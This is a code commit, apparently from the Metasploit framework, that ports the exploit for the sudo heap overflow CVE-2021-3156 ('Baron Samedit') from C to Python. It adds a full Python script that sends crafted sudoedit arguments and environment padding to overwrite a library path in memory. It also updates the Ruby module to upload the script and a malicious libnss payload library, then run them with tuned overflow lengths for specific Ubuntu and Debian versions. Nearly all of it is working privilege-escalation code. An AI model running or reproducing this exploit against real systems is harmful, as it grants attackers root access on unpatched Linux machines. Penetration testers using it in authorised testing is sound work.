Port sudoedit exploit to Python

It's assumed that Python is more likely to be present on the target system
than gcc, so is better as a dependency.

data/exploits/CVE-2021-3156/exploit.py

@@ -0,0 +1,26 @@
+import sys
+import os
+from ctypes import cdll, c_char_p, POINTER
+
+libc = cdll.LoadLibrary("libc.so.6")
+libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
+
+smash_len_a    = int(sys.argv[1])
+smash_len_b    = int(sys.argv[2])
+null_stomp_len = int(sys.argv[3])
+lc_all_len     = int(sys.argv[4])
+so_overwrite   = sys.argv[5]
+working_dir    = sys.argv[6]
+
+argv = [b'sudoedit', b'-s', b'#' * smash_len_a + b'\\', b'\\', b'#' * smash_len_b + b'\\', None]
+cmd = b'/usr/bin/sudoedit'
+env = [b'\\'] * null_stomp_len
+env.append(so_overwrite.encode('latin-1'))
+env.append(b'LC_ALL=C.UTF-8@' + (b'C' * lc_all_len))
+env.append(None)
+
+cargv = (c_char_p * len(argv))(*argv)
+cenvp = (c_char_p * len(env))(*env)
+
+os.chdir(working_dir)
+libc.execve(cmd, cargv, cenvp)

modules/exploits/linux/local/sudo_baron_samedit.rb

@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Post::File
   include Msf::Post::Unix
-  include Msf::Post::Linux::Compile
   include Msf::Post::Linux::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -47,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Targets' =>
           [
             [ 'Automatic', {} ],
-            [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
+            [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
             [ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 19\.04/ } ],
             [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 18\.04/ } ],
             [ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { lengths: [ 64, 49, 60, 214 ], version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
@@ -126,6 +125,12 @@ class MetasploitModule < Msf::Exploit::Local
     selected_target
   end
 
+  def find_exec_program
+    return 'python' if command_exists?('python')
+    return 'python3' if command_exists?('python3')
+    return false
+  end
+
   def exploit
     if target.name == 'Manual'
       fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
@@ -134,19 +139,25 @@ class MetasploitModule < Msf::Exploit::Local
       lengths = (target.name == 'Automatic' ? get_automatic_target : target)[:lengths].join(' ')
     end
 
-    fail_with(Failure::NotFound, 'The gcc binary was not found') unless has_gcc?
+    python_binary = find_exec_program
+    
+    fail_with(Failure::NotFound, 'The python binary was not found') unless python_binary
+
+    vprint_status("Using '#{python_binary}' to run exploit")
 
     path = datastore['WritableDir']
 
-    exe_file_name = rand_text_alphanumeric(5..10)
     overwrite_path = rand_overwrite_path # the part that is overwritten in memory to construct the full path
     lib_file_path = "libnss_#{overwrite_path} .so.2"  # the full path
 
-    upload_and_compile("#{path}/#{exe_file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
-    register_files_for_cleanup("#{path}/#{exe_file_name}")
+    python_script_name = rand_text_alphanumeric(5..10) + '.py'
+    upload("#{path}/#{python_script_name}", exploit_data('CVE-2021-3156', 'exploit.py'))
+    register_files_for_cleanup("#{path}/#{python_script_name}")
     mkdir("#{path}/#{lib_file_path.rpartition('/').first}")
     upload("#{path}/#{lib_file_path}", generate_payload_dll)
-    cmd_exec("'#{path}/#{exe_file_name}' #{lengths} '#{overwrite_path}'")
+    cmd = "#{python_binary} #{path}/#{python_script_name} #{lengths} #{overwrite_path} #{path}"
+    vprint_status("Running #{cmd}")
+    cmd_exec(cmd)
   end
 
   def rand_overwrite_path